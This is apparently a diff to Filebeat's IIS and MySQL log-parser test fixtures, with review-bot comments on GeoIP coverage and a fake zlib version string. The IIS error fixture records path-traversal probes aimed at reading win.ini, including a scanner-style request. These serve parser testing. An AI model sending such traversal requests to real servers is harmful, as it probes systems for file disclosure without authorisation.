@@ -106,7 +104,7 @@ "event.duration": 789000000, "event.kind": "event", "event.module": "iis", - "event.original": "2018-01-01 10:11:12 W3SVC1 MACHINE-NAME 127.0.0.1 GET / - 80 - 85.181.35.98 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36 - - example.com 200 0 0 123 456 789", + "event.original": "2018-01-01 10:11:12 W3SVC1 MACHINE-NAME 127.0.0.1 GET / - 80 - 81.2.69.143 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36 - - example.com 200 0 0 123 456 789", "event.outcome": "success", "event.type": [ "connection" @@ -122,24 +120,22 @@ "iis.access.sub_status": 0, "iis.access.win32_status": 0, "input.type": "log", - "log.offset": 1204, + "log.offset": 1203, "related.ip": [ "127.0.0.1", - "85.181.35.98" + "81.2.69.143" ], "service.type": "iis", - "source.address": "85.181.35.98", - "source.as.number": 6805, - "source.as.organization.name": "Telefonica Germany", - "source.geo.city_name": "Berlin", + "source.address": "81.2.69.143", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "DE", - "source.geo.country_name": "Germany", - "source.geo.location.lat": 52.4473, - "source.geo.location.lon": 13.4531, - "source.geo.region_iso_code": "DE-BE", - "source.geo.region_name": "Land Berlin", - "source.ip": "85.181.35.98", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "url.domain": "example.com", "url.original": "/", "url.path": "/", @@ -175,7 +171,7 @@ "iis.access.sub_status": 0, "iis.access.win32_status": 0, "input.type": "log", - "log.offset": 1447, + "log.offset": 1445, "related.ip": [ "10.44.0.136", "10.50.6.188" 
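Review bot: Switching to `81.2.69.143` removes `source.as.number` and `source.as.organization.name` from this expected document (and from the other iis fixtures in this change) while adding city/region data, so the iis access fixture now checks the City lookup but no longer the ASN lookup that `85.181.35.98` covered. Taken together with the haproxy fixtures, which keep only the AS fields, each enrichment is still asserted somewhere, but no iis document verifies both processors on one event any more. If per-module coverage matters, `216.160.83.61` from the auditd fixture carries both `source.as.number` and `source.geo.*` in this same diff and would be a drop-in choice. The `log.offset` adjustments (709→708, 1204→1203, 1447→1445, 1802→1800) are consistent with the one-byte-shorter address and look right.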
@@ -218,7 +214,7 @@ "iis.access.sub_status": 0, "iis.access.win32_status": 2, "input.type": "log", - "log.offset": 1802, + "log.offset": 1800, "related.ip": [ "10.44.0.136", "10.50.6.188" diff --git a/filebeat/module/iis/error/test/iis_error_url.log b/filebeat/module/iis/error/test/iis_error_url.log index 12b3262a924e..b6f9a2e849dc 100644 --- a/filebeat/module/iis/error/test/iis_error_url.log +++ b/filebeat/module/iis/error/test/iis_error_url.log 
@@ -1,8 +1,8 @@
-2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/0.9 t3 12.2.1 400 - URL -
-2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET ./././././../../../../../../../../ 400 - URL -
-2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET /..\pixfir~1\how_to_login.html 403 - Forbidden -
-2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET ..\..\..\..\..\..\winnt\win.ini 400 - URL -
-2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET /�.�./�.�./�.�./�.�./�.�./windows/win.ini 404 - NotFound -
-2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET /nessus\..\..\..\..\..\..\winnt\win.ini 403 - Forbidden -
-2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 OPTIONS * 404 - NotFound -
-2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET /fee&fie=foe 400 - URL -
+2018-05-05 05:05:55 81.2.69.145 12345 192.168.101.101 443 HTTP/0.9 t3 12.2.1 400 - URL -
+2018-05-05 05:05:55 81.2.69.145 12345 192.168.101.101 443 HTTP/1.1 GET ./././././../../../../../../../../ 400 - URL -
+2018-05-05 05:05:55 81.2.69.145 12345 192.168.101.101 443 HTTP/1.1 GET /..\pixfir~1\how_to_login.html 403 - Forbidden -
+2018-05-05 05:05:55 81.2.69.145 12345 192.168.101.101 443 HTTP/1.1 GET ..\..\..\..\..\..\winnt\win.ini 400 - URL -
+2018-05-05 05:05:55 81.2.69.145 12345 192.168.101.101 443 HTTP/1.1 GET /�.�./�.�./�.�./�.�./�.�./windows/win.ini 404 - NotFound -
+2018-05-05 05:05:55 81.2.69.145 12345 192.168.101.101 443 HTTP/1.1 GET /nessus\..\..\..\..\..\..\winnt\win.ini 403 - Forbidden -
+2018-05-05 05:05:55 81.2.69.145 12345 192.168.101.101 443 HTTP/1.1 OPTIONS * 404 - NotFound -
+2018-05-05 05:05:55 81.2.69.145 12345 192.168.101.101 443 HTTP/1.1 GET /fee&fie=foe 400 - URL -
diff --git a/filebeat/module/iis/error/test/iis_error_url.log-expected.json b/filebeat/module/iis/error/test/iis_error_url.log-expected.json index 7c1ea1d79e03..cc7213141754 100644 --- a/filebeat/module/iis/error/test/iis_error_url.log-expected.json +++ b/filebeat/module/iis/error/test/iis_error_url.log-expected.json @@ -11,7 +11,7 @@ "event.dataset": "iis.error", "event.kind": "event", "event.module": "iis", - "event.original": "2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/0.9 t3 12.2.1 400 - URL -", + "event.original": "2018-05-05 05:05:55 81.2.69.145 12345 192.168.101.101 443 HTTP/0.9 t3 12.2.1 400 - URL -", "event.outcome": "failure", "event.type": [ "connection" @@ -24,17 +24,20 @@ "input.type": "log", "log.offset": 0, "related.ip": [ - "149.42.83.135", - "192.168.101.101" + "192.168.101.101", + "81.2.69.145" ], "service.type": "iis", - "source.address": "149.42.83.135", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "149.42.83.135", + "source.address": "81.2.69.145", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.145", "source.port": 12345, "url.extension": "1", "url.original": "12.2.1", 
@@ -52,7 +55,7 @@ "event.dataset": "iis.error", "event.kind": "event", "event.module": "iis", - "event.original": "2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET ./././././../../../../../../../../ 400 - URL -", + "event.original": "2018-05-05 05:05:55 81.2.69.145 12345 192.168.101.101 443 HTTP/1.1 GET ./././././../../../../../../../../ 400 - URL -", "event.outcome": "failure", "event.type": [ "connection" @@ -63,19 +66,22 @@ "http.version": "1.1", "iis.error.reason_phrase": "URL", "input.type": "log", - "log.offset": 91, + "log.offset": 89, "related.ip": [ - "149.42.83.135", - "192.168.101.101" + "192.168.101.101", + "81.2.69.145" ], "service.type": "iis", - "source.address": "149.42.83.135", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "149.42.83.135", + "source.address": "81.2.69.145", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.145", "source.port": 12345, "url.extension": "/", "url.original": "./././././../../../../../../../../", @@ -93,7 +99,7 @@ "event.dataset": "iis.error", "event.kind": "event", "event.module": "iis", - "event.original": "2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET /..\\pixfir~1\\how_to_login.html 403 - Forbidden -", + "event.original": "2018-05-05 05:05:55 81.2.69.145 12345 192.168.101.101 443 HTTP/1.1 GET /..\\pixfir~1\\how_to_login.html 403 - Forbidden -", "event.outcome": "failure", "event.type": [ "connection" 
@@ -104,19 +110,22 @@ "http.version": "1.1", "iis.error.reason_phrase": "Forbidden", "input.type": "log", - "log.offset": 211, + "log.offset": 207, "related.ip": [ - "149.42.83.135", - "192.168.101.101" + "192.168.101.101", + "81.2.69.145" ], "service.type": "iis", - "source.address": "149.42.83.135", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "149.42.83.135", + "source.address": "81.2.69.145", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.145", "source.port": 12345, "url.original": "/..\\pixfir~1\\how_to_login.html" }, @@ -132,7 +141,7 @@ "event.dataset": "iis.error", "event.kind": "event", "event.module": "iis", - "event.original": "2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET ..\\..\\..\\..\\..\\..\\winnt\\win.ini 400 - URL -", + "event.original": "2018-05-05 05:05:55 81.2.69.145 12345 192.168.101.101 443 HTTP/1.1 GET ..\\..\\..\\..\\..\\..\\winnt\\win.ini 400 - URL -", "event.outcome": "failure", "event.type": [ "connection" 
@@ -143,19 +152,22 @@ "http.version": "1.1", "iis.error.reason_phrase": "URL", "input.type": "log", - "log.offset": 333, + "log.offset": 327, "related.ip": [ - "149.42.83.135", - "192.168.101.101" + "192.168.101.101", + "81.2.69.145" ], "service.type": "iis", - "source.address": "149.42.83.135", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "149.42.83.135", + "source.address": "81.2.69.145", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.145", "source.port": 12345, "url.original": "..\\..\\..\\..\\..\\..\\winnt\\win.ini" }, @@ -171,7 +183,7 @@ "event.dataset": "iis.error", "event.kind": "event", "event.module": "iis", - "event.original": "2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET /\ufffd.\ufffd./\ufffd.\ufffd./\ufffd.\ufffd./\ufffd.\ufffd./\ufffd.\ufffd./windows/win.ini 404 - NotFound -", + "event.original": "2018-05-05 05:05:55 81.2.69.145 12345 192.168.101.101 443 HTTP/1.1 GET /\ufffd.\ufffd./\ufffd.\ufffd./\ufffd.\ufffd./\ufffd.\ufffd./\ufffd.\ufffd./windows/win.ini 404 - NotFound -", "event.outcome": "failure", "event.type": [ "connection" 
@@ -182,19 +194,22 @@ "http.version": "1.1", "iis.error.reason_phrase": "NotFound", "input.type": "log", - "log.offset": 450, + "log.offset": 442, "related.ip": [ - "149.42.83.135", - "192.168.101.101" + "192.168.101.101", + "81.2.69.145" ], "service.type": "iis", - "source.address": "149.42.83.135", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "149.42.83.135", + "source.address": "81.2.69.145", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.145", "source.port": 12345, "url.extension": "ini", "url.original": "/\ufffd.\ufffd./\ufffd.\ufffd./\ufffd.\ufffd./\ufffd.\ufffd./\ufffd.\ufffd./windows/win.ini", @@ -212,7 +227,7 @@ "event.dataset": "iis.error", "event.kind": "event", "event.module": "iis", - "event.original": "2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET /nessus\\..\\..\\..\\..\\..\\..\\winnt\\win.ini 403 - Forbidden -", + "event.original": "2018-05-05 05:05:55 81.2.69.145 12345 192.168.101.101 443 HTTP/1.1 GET /nessus\\..\\..\\..\\..\\..\\..\\winnt\\win.ini 403 - Forbidden -", "event.outcome": "failure", "event.type": [ "connection" 
@@ -223,19 +238,22 @@ "http.version": "1.1", "iis.error.reason_phrase": "Forbidden", "input.type": "log", - "log.offset": 602, + "log.offset": 592, "related.ip": [ - "149.42.83.135", - "192.168.101.101" + "192.168.101.101", + "81.2.69.145" ], "service.type": "iis", - "source.address": "149.42.83.135", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "149.42.83.135", + "source.address": "81.2.69.145", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.145", "source.port": 12345, "url.original": "/nessus\\..\\..\\..\\..\\..\\..\\winnt\\win.ini" }, @@ -251,7 +269,7 @@ "event.dataset": "iis.error", "event.kind": "event", "event.module": "iis", - "event.original": "2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 OPTIONS * 404 - NotFound -", + "event.original": "2018-05-05 05:05:55 81.2.69.145 12345 192.168.101.101 443 HTTP/1.1 OPTIONS * 404 - NotFound -", "event.outcome": "failure", "event.type": [ "connection" 
@@ -262,19 +280,22 @@ "http.version": "1.1", "iis.error.reason_phrase": "NotFound", "input.type": "log", - "log.offset": 733, + "log.offset": 721, "related.ip": [ - "149.42.83.135", - "192.168.101.101" + "192.168.101.101", + "81.2.69.145" ], "service.type": "iis", - "source.address": "149.42.83.135", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "149.42.83.135", + "source.address": "81.2.69.145", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.145", "source.port": 12345, "url.original": "*", "url.path": "*" @@ -291,7 +312,7 @@ "event.dataset": "iis.error", "event.kind": "event", "event.module": "iis", - "event.original": "2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET /fee&fie=foe 400 - URL -", + "event.original": "2018-05-05 05:05:55 81.2.69.145 12345 192.168.101.101 443 HTTP/1.1 GET /fee&fie=foe 400 - URL -", "event.outcome": "failure", "event.type": [ "connection" 
@@ -302,19 +323,22 @@ "http.version": "1.1", "iis.error.reason_phrase": "URL", "input.type": "log", - "log.offset": 829, + "log.offset": 815, "related.ip": [ - "149.42.83.135", - "192.168.101.101" + "192.168.101.101", + "81.2.69.145" ], "service.type": "iis", - "source.address": "149.42.83.135", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "149.42.83.135", + "source.address": "81.2.69.145", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.145", "source.port": 12345, "url.original": "/fee&fie=foe", "url.path": "/fee&fie=foe" diff --git a/filebeat/module/iis/error/test/test.log b/filebeat/module/iis/error/test/test.log index f50daaa02f78..d30beadbba3e 100644 --- a/filebeat/module/iis/error/test/test.log +++ b/filebeat/module/iis/error/test/test.log 
@@ -3,6 +3,6 @@
 #Date: 2018-01-01 08:09:10
 #Fields: date time c-ip c-port s-ip s-port cs-version cs-method cs-uri sc-status s-siteid s-reason s-queuename
 2018-01-01 08:09:10 172.31.77.6 2094 172.31.77.6 80 HTTP/1.1 GET /qos/1kbfile.txt 503 - ConnLimit -
-2018-01-01 09:10:11 85.181.35.98 2780 127.0.0.1 80 HTTP/1.1 GET /ThisIsMyUrl.htm 400 - Hostname -
-2018-01-01 10:11:12 85.181.35.98 2894 127.0.0.1 80 HTTP/2.0 GET / 505 - Version_N/S -
-2018-01-01 11:12:13 85.181.35.98 64388 127.0.0.1 80 - - - - - Timer_MinBytesPerSecond -
+2018-01-01 09:10:11 81.2.69.143 2780 127.0.0.1 80 HTTP/1.1 GET /ThisIsMyUrl.htm 400 - Hostname -
+2018-01-01 10:11:12 81.2.69.143 2894 127.0.0.1 80 HTTP/2.0 GET / 505 - Version_N/S -
+2018-01-01 11:12:13 81.2.69.143 64388 127.0.0.1 80 - - - - - Timer_MinBytesPerSecond -
diff --git a/filebeat/module/iis/error/test/test.log-expected.json b/filebeat/module/iis/error/test/test.log-expected.json
index 4be3dc9ae9a0..b9f55cbd7cf2 100644
--- a/filebeat/module/iis/error/test/test.log-expected.json
+++ b/filebeat/module/iis/error/test/test.log-expected.json
@@ -47,7 +47,7 @@
 "event.dataset": "iis.error",
 "event.kind": "event",
 "event.module": "iis",
- "event.original": "2018-01-01 09:10:11 85.181.35.98 2780 127.0.0.1 80 HTTP/1.1 GET /ThisIsMyUrl.htm 400 - Hostname -",
+ "event.original": "2018-01-01 09:10:11 81.2.69.143 2780 127.0.0.1 80 HTTP/1.1 GET /ThisIsMyUrl.htm 400 - Hostname -",
 "event.outcome": "failure",
 "event.type": [
 "connection"
@@ -61,21 +61,19 @@ "log.offset": 286, "related.ip": [ "127.0.0.1", - "85.181.35.98" + "81.2.69.143" ], "service.type": "iis", - "source.address": "85.181.35.98", - "source.as.number": 6805, - "source.as.organization.name": "Telefonica Germany", - "source.geo.city_name": "Berlin", + "source.address": "81.2.69.143", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "DE", - "source.geo.country_name": "Germany", - "source.geo.location.lat": 52.4473, - "source.geo.location.lon": 13.4531, - "source.geo.region_iso_code": "DE-BE", - "source.geo.region_name": "Land Berlin", - "source.ip": "85.181.35.98", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "source.port": 2780, "url.extension": "htm", "url.original": "/ThisIsMyUrl.htm", @@ -93,7 +91,7 @@ "event.dataset": "iis.error", "event.kind": "event", "event.module": "iis", - "event.original": "2018-01-01 10:11:12 85.181.35.98 2894 127.0.0.1 80 HTTP/2.0 GET / 505 - Version_N/S -", + "event.original": "2018-01-01 10:11:12 81.2.69.143 2894 127.0.0.1 80 HTTP/2.0 GET / 505 - Version_N/S -", "event.outcome": "failure", "event.type": [ "connection" 
@@ -104,24 +102,22 @@ "http.version": "2.0", "iis.error.reason_phrase": "Version_N/S", "input.type": "log", - "log.offset": 384, + "log.offset": 383, "related.ip": [ "127.0.0.1", - "85.181.35.98" + "81.2.69.143" ], "service.type": "iis", - "source.address": "85.181.35.98", - "source.as.number": 6805, - "source.as.organization.name": "Telefonica Germany", - "source.geo.city_name": "Berlin", + "source.address": "81.2.69.143", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "DE", - "source.geo.country_name": "Germany", - "source.geo.location.lat": 52.4473, - "source.geo.location.lon": 13.4531, - "source.geo.region_iso_code": "DE-BE", - "source.geo.region_name": "Land Berlin", - "source.ip": "85.181.35.98", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "source.port": 2894, "url.original": "/", "url.path": "/" 
@@ -138,31 +134,29 @@ "event.dataset": "iis.error", "event.kind": "event", "event.module": "iis", - "event.original": "2018-01-01 11:12:13 85.181.35.98 64388 127.0.0.1 80 - - - - - Timer_MinBytesPerSecond -", + "event.original": "2018-01-01 11:12:13 81.2.69.143 64388 127.0.0.1 80 - - - - - Timer_MinBytesPerSecond -", "event.type": [ "connection" ], "fileset.name": "error", "iis.error.reason_phrase": "Timer_MinBytesPerSecond", "input.type": "log", - "log.offset": 470, + "log.offset": 468, "related.ip": [ "127.0.0.1", - "85.181.35.98" + "81.2.69.143" ], "service.type": "iis", - "source.address": "85.181.35.98", - "source.as.number": 6805, - "source.as.organization.name": "Telefonica Germany", - "source.geo.city_name": "Berlin", + "source.address": "81.2.69.143", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "DE", - "source.geo.country_name": "Germany", - "source.geo.location.lat": 52.4473, - "source.geo.location.lon": 13.4531, - "source.geo.region_iso_code": "DE-BE", - "source.geo.region_name": "Land Berlin", - "source.ip": "85.181.35.98", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "source.port": 64388 } ] \ No newline at end of file diff --git a/filebeat/module/mysql/error/test/mysql-ubuntu-5.5.53.log b/filebeat/module/mysql/error/test/mysql-ubuntu-5.5.53.log index 31aa8efdf710..ca8339e669bf 100644 --- a/filebeat/module/mysql/error/test/mysql-ubuntu-5.5.53.log +++ b/filebeat/module/mysql/error/test/mysql-ubuntu-5.5.53.log 
@@ -2,7 +2,7 @@
 161209 14:18:50 [Note] Plugin 'FEDERATED' is disabled.
 161209 14:18:50 InnoDB: The InnoDB memory heap is disabled
 161209 14:18:50 InnoDB: Mutexes and rw_locks use GCC atomic builtins
-161209 14:18:50 InnoDB: Compressed tables use zlib 1.2.3.4
+161209 14:18:50 InnoDB: Compressed tables use zlib 1.128.3.4
 161209 14:18:50 InnoDB: Initializing buffer pool, size = 128.0M
 161209 14:18:50 InnoDB: Completed initialization of buffer pool
 InnoDB: The first specified data file ./ibdata1 did not exist:
@@ -28,7 +28,7 @@ InnoDB: Foreign key constraint system tables created
 161209 14:18:52 [Note] Plugin 'FEDERATED' is disabled.
 161209 14:18:52 InnoDB: The InnoDB memory heap is disabled
 161209 14:18:52 InnoDB: Mutexes and rw_locks use GCC atomic builtins
-161209 14:18:52 InnoDB: Compressed tables use zlib 1.2.3.4
+161209 14:18:52 InnoDB: Compressed tables use zlib 1.128.3.4
 161209 14:18:52 InnoDB: Initializing buffer pool, size = 128.0M
 161209 14:18:52 InnoDB: Completed initialization of buffer pool
 161209 14:18:52 InnoDB: highest supported file format is Barracuda.
@@ -45,7 +45,7 @@ ERROR: 1064 You have an error in your SQL syntax; check the manual that corresp
 161209 14:18:53 [Note] Plugin 'FEDERATED' is disabled.
 161209 14:18:53 InnoDB: The InnoDB memory heap is disabled
 161209 14:18:53 InnoDB: Mutexes and rw_locks use GCC atomic builtins
-161209 14:18:53 InnoDB: Compressed tables use zlib 1.2.3.4
+161209 14:18:53 InnoDB: Compressed tables use zlib 1.128.3.4
 161209 14:18:53 InnoDB: Initializing buffer pool, size = 128.0M
 161209 14:18:53 InnoDB: Completed initialization of buffer pool
 161209 14:18:53 InnoDB: highest supported file format is Barracuda.
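Review bot: The replacement string `zlib 1.128.3.4` on the added line of the first hunk is not a version zlib has ever shipped, so this sample log no longer reproduces what a real mysqld 5.5 on Ubuntu 12.04 writes, which is the whole value of a parser fixture. Presumably the goal is to stop an IP-literal scan from matching `1.2.3.4` (a routable dotted quad); if so, a genuine three-component release such as `161209 14:18:50 InnoDB: Compressed tables use zlib 1.2.8` keeps the line authentic and still cannot parse as IPv4. Whichever value is chosen, the reason should be recorded in the commit message, since nothing in a .log fixture can carry a comment, and the `log.offset` values in the expected JSON must be regenerated again because every later offset shifts with the string length. The same substitution is repeated in each of the other hunks of this file.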
@@ -62,7 +62,7 @@ ERROR: 1064 You have an error in your SQL syntax; check the manual that corresp
 161209 14:18:56 [Note] Plugin 'FEDERATED' is disabled.
 161209 14:18:56 InnoDB: The InnoDB memory heap is disabled
 161209 14:18:56 InnoDB: Mutexes and rw_locks use GCC atomic builtins
-161209 14:18:56 InnoDB: Compressed tables use zlib 1.2.3.4
+161209 14:18:56 InnoDB: Compressed tables use zlib 1.128.3.4
 161209 14:18:56 InnoDB: Initializing buffer pool, size = 128.0M
 161209 14:18:56 InnoDB: Completed initialization of buffer pool
 161209 14:18:57 InnoDB: highest supported file format is Barracuda.
@@ -85,7 +85,7 @@ Version: '5.5.53-0ubuntu0.12.04.1' socket: '/var/run/mysqld/mysqld.sock' port:
 161209 14:37:57 [Note] Plugin 'FEDERATED' is disabled.
 161209 14:37:57 InnoDB: The InnoDB memory heap is disabled
 161209 14:37:57 InnoDB: Mutexes and rw_locks use GCC atomic builtins
-161209 14:37:57 InnoDB: Compressed tables use zlib 1.2.3.4
+161209 14:37:57 InnoDB: Compressed tables use zlib 1.128.3.4
 161209 14:37:57 InnoDB: Initializing buffer pool, size = 128.0M
 161209 14:37:57 InnoDB: Completed initialization of buffer pool
 161209 14:37:57 InnoDB: highest supported file format is Barracuda.
@@ -101,7 +101,7 @@ Version: '5.5.53-0ubuntu0.12.04.1-log' socket: '/var/run/mysqld/mysqld.sock' p
 161209 14:18:50 [Note] Plugin 'FEDERATED' is disabled.
 161209 14:18:50 InnoDB: The InnoDB memory heap is disabled
 161209 14:18:50 InnoDB: Mutexes and rw_locks use GCC atomic builtins
-161209 14:18:50 InnoDB: Compressed tables use zlib 1.2.3.4
+161209 14:18:50 InnoDB: Compressed tables use zlib 1.128.3.4
 161209 14:18:50 InnoDB: Initializing buffer pool, size = 128.0M
 161209 14:18:50 InnoDB: Completed initialization of buffer pool
 InnoDB: The first specified data file ./ibdata1 did not exist:
@@ -127,7 +127,7 @@ InnoDB: Foreign key constraint system tables created
 161209 14:18:52 [Note] Plugin 'FEDERATED' is disabled.
 161209 14:18:52 InnoDB: The InnoDB memory heap is disabled
 161209 14:18:52 InnoDB: Mutexes and rw_locks use GCC atomic builtins
-161209 14:18:52 InnoDB: Compressed tables use zlib 1.2.3.4
+161209 14:18:52 InnoDB: Compressed tables use zlib 1.128.3.4
 161209 14:18:52 InnoDB: Initializing buffer pool, size = 128.0M
 161209 14:18:52 InnoDB: Completed initialization of buffer pool
 161209 14:18:52 InnoDB: highest supported file format is Barracuda.
@@ -144,7 +144,7 @@ ERROR: 1064 You have an error in your SQL syntax; check the manual that corresp
 161209 14:18:53 [Note] Plugin 'FEDERATED' is disabled.
 161209 14:18:53 InnoDB: The InnoDB memory heap is disabled
 161209 14:18:53 InnoDB: Mutexes and rw_locks use GCC atomic builtins
-161209 14:18:53 InnoDB: Compressed tables use zlib 1.2.3.4
+161209 14:18:53 InnoDB: Compressed tables use zlib 1.128.3.4
 161209 14:18:53 InnoDB: Initializing buffer pool, size = 128.0M
 161209 14:18:53 InnoDB: Completed initialization of buffer pool
 161209 14:18:53 InnoDB: highest supported file format is Barracuda.
@@ -156,7 +156,7 @@ ERROR: 1064 You have an error in your SQL syntax; check the manual that corresp
 161209 14:18:55 [Note] Plugin 'FEDERATED' is disabled.
 161209 14:18:55 InnoDB: The InnoDB memory heap is disabled
 161209 14:18:55 InnoDB: Mutexes and rw_locks use GCC atomic builtins
-161209 14:18:55 InnoDB: Compressed tables use zlib 1.2.3.4
+161209 14:18:55 InnoDB: Compressed tables use zlib 1.128.3.4
 161209 14:18:55 InnoDB: Initializing buffer pool, size = 128.0M
 161209 14:18:55 InnoDB: Completed initialization of buffer pool
 161209 14:18:55 InnoDB: highest supported file format is Barracuda.
@@ -173,7 +173,7 @@ ERROR: 1050 Table 'plugin' already exists
 161209 14:18:56 [Note] Plugin 'FEDERATED' is disabled.
 161209 14:18:56 InnoDB: The InnoDB memory heap is disabled
 161209 14:18:56 InnoDB: Mutexes and rw_locks use GCC atomic builtins
-161209 14:18:56 InnoDB: Compressed tables use zlib 1.2.3.4
+161209 14:18:56 InnoDB: Compressed tables use zlib 1.128.3.4
 161209 14:18:56 InnoDB: Initializing buffer pool, size = 128.0M
 161209 14:18:56 InnoDB: Completed initialization of buffer pool
 161209 14:18:57 InnoDB: highest supported file format is Barracuda.
@@ -196,7 +196,7 @@ Version: '5.5.53-0ubuntu0.12.04.1' socket: '/var/run/mysqld/mysqld.sock' port:
 161209 14:37:57 [Note] Plugin 'FEDERATED' is disabled.
 161209 14:37:57 InnoDB: The InnoDB memory heap is disabled
 161209 14:37:57 InnoDB: Mutexes and rw_locks use GCC atomic builtins
